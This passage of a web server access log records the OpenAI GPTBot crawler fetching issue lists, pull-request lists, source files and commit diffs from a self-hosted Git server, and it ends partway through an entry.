+[17/Feb/2026:18:53:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10073] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=farduedate&state=all&type=all" +[17/Feb/2026:18:53:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 11156] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/localpycs" +[17/Feb/2026:18:53:25 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/PostgresPatrol/build/PostgresPatrol/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/localpycs/pyimod02_importers.pyc" +[17/Feb/2026:18:53:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/PostgresPatrol/build/PostgresPatrol/localpycs/pyimod02_importers.pyc" +[17/Feb/2026:18:53:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10025] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?sort=mostcomment&state=closed&type=all" +[17/Feb/2026:18:53:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10000] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?project=-1&sort=oldest&state=all&type=all" +[17/Feb/2026:18:53:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&milestone=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10005] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?milestone=-1&sort=oldest&state=all&type=all" +[17/Feb/2026:18:53:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 9997] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&project=-1&sort=oldest&state=open&type=all" +[17/Feb/2026:18:53:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10162] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?project=-1&sort=oldest&state=all&type=all" +[17/Feb/2026:18:53:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&milestone=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10007] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?milestone=-1&sort=oldest&state=all&type=all" +[17/Feb/2026:18:53:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10159] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?project=-1&sort=oldest&state=all&type=all" +[17/Feb/2026:18:53:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10164] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?project=-1&sort=oldest&state=all&type=all" +[17/Feb/2026:18:53:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&milestone=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10001] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?milestone=-1&sort=oldest&state=all&type=all" +[17/Feb/2026:18:53:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/PostgresPatrol/build/PostgresPatrol/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 9873] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/localpycs/pyimod03_ctypes.pyc" +[17/Feb/2026:18:53:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/PostgresPatrol/build/PostgresPatrol/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 1063] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/localpycs/pyimod03_ctypes.pyc" +[17/Feb/2026:18:53:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10157] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?project=-1&sort=oldest&state=all&type=all" +[17/Feb/2026:18:53:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&milestone=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10171] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?milestone=-1&sort=oldest&state=all&type=all" +[17/Feb/2026:18:53:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&milestone=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10170] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?milestone=-1&sort=oldest&state=all&type=all" +[17/Feb/2026:18:53:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 9992] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&project=-1&sort=oldest&state=closed&type=all" +[17/Feb/2026:18:53:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10021] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?sort=leastcomment&state=open&type=all" +[17/Feb/2026:18:53:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10210] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=mostcomment&state=open&type=all" +[17/Feb/2026:18:53:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10028] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?sort=nearduedate&state=open&type=all" +[17/Feb/2026:18:53:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10211] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=farduedate&state=open&type=all" +[17/Feb/2026:18:53:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10018] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?sort=recentupdate&state=open&type=all" +[17/Feb/2026:18:53:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10206] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=leastcomment&state=open&type=all" +[17/Feb/2026:18:53:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10049] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?sort=leastupdate&state=closed&type=all" +[17/Feb/2026:18:53:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&milestone=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10037] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&milestone=-1&sort=leastcomment&state=open&type=all" +[17/Feb/2026:18:53:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&milestone=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10038] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&milestone=-1&sort=leastcomment&state=open&type=all" +[17/Feb/2026:18:53:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10211] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&project=-1&sort=mostcomment&state=open&type=all" +[17/Feb/2026:18:53:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10213] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&project=-1&sort=mostcomment&state=open&type=all" +[17/Feb/2026:18:53:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2fTestProject%2fbuild%2f.cmake%2fapi%2fv1%2fquery%2fclient-vscode" [Client 74.7.227.38] [Length 24917] [Gzip 4.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" +[17/Feb/2026:18:53:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2findustrial-comm%2fbuild%2fcpp%2fCMakeFiles%2fcomm_core.dir%2fsrc%2fcontroller.cpp.o" [Client 74.7.227.38] [Length 24234] [Gzip 4.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/controller.cpp.o" +[17/Feb/2026:18:53:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/3e4db647c22a7292965a613e62ce815b9da823a8?files=C%2b%2bProject%2findustrial-comm%2fbuild%2fcpp%2fCMakeFiles%2fcomm_core.dir%2fcompiler_depend.make" [Client 74.7.227.38] [Length 22795] [Gzip 3.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" +[17/Feb/2026:18:53:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/3e4db647c22a7292965a613e62ce815b9da823a8?files=C%2b%2bProject%2findustrial-comm%2fbuild%2fcpp%2fCMakeFiles%2fcomm_core.dir%2fcmake_clean.cmake" [Client 74.7.227.38] [Length 23477] [Gzip 4.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" +[17/Feb/2026:18:53:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/3e4db647c22a7292965a613e62ce815b9da823a8?files=C%2b%2bProject%2findustrial-comm%2fbuild%2fcpp%2fCMakeFiles%2fcomm_core.dir%2fcompiler_depend.ts" [Client 74.7.227.38] [Length 22886] [Gzip 3.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" +[17/Feb/2026:18:53:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c?files=PostgresPatrol%2fPatrol%20Window%20Service%20%eb%93%b1%eb%a1%9d%2frequirements-windows.txt" [Client 74.7.227.38] [Length 20600] [Gzip 3.61] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/requirements-windows.txt" +[17/Feb/2026:18:53:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/build_exe.bat?display=source" [Client 74.7.227.38] [Length 13500] [Gzip 4.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/build_exe.bat" +[17/Feb/2026:18:53:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/test_run.bat?display=rendered" [Client 74.7.227.38] [Length 11249] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/test_run.bat" +[17/Feb/2026:18:53:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10211] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=farduedate&state=closed&type=all" +[17/Feb/2026:18:53:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10205] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=mostcomment&state=open&type=all" +[17/Feb/2026:18:53:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10015] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?sort=recentupdate&state=open&type=all" +[17/Feb/2026:18:53:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10019] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?sort=nearduedate&state=closed&type=all" +[17/Feb/2026:18:53:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10016] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?sort=leastcomment&state=open&type=all" +[17/Feb/2026:18:53:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10021] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?sort=farduedate&state=closed&type=all" +[17/Feb/2026:18:53:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10022] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?sort=mostcomment&state=open&type=all" +[17/Feb/2026:18:53:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d?files=GoldPilot%2f%ec%8a%a4%eb%a0%88%eb%93%9c_%eb%b6%84%eb%a6%ac_%ec%9e%91%ec%97%85_%ec%99%84%eb%a3%8c.md" [Client 74.7.227.38] [Length 34481] [Gzip 7.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/%EC%8A%A4%EB%A0%88%EB%93%9C_%EB%B6%84%EB%A6%AC_%EC%9E%91%EC%97%85_%EC%99%84%EB%A3%8C.md" +[17/Feb/2026:18:53:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt?display=source" [Client 74.7.227.38] [Length 12558] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt" +[17/Feb/2026:18:53:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt?display=source" [Client 74.7.227.38] [Length 12550] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt" +[17/Feb/2026:18:53:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt?display=rendered" [Client 74.7.227.38] [Length 11016] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt" +[17/Feb/2026:18:53:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt?display=rendered" [Client 74.7.227.38] [Length 11020] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt" +[17/Feb/2026:18:53:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?milestone=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10197] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=latest&state=closed&type=all" +[17/Feb/2026:18:53:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?milestone=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10195] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=latest&state=closed&type=all" +[17/Feb/2026:18:53:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/industrial-comm/src-old/old_log_macros.hpp" [Client 74.7.227.38] [Length 9885] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/src-old/old_log_macros.hpp" +[17/Feb/2026:18:53:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/src-old/old_log_macros.hpp" [Client 74.7.227.38] [Length 11677] [Gzip 4.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/src-old/old_log_macros.hpp" +[17/Feb/2026:18:53:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10198] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; 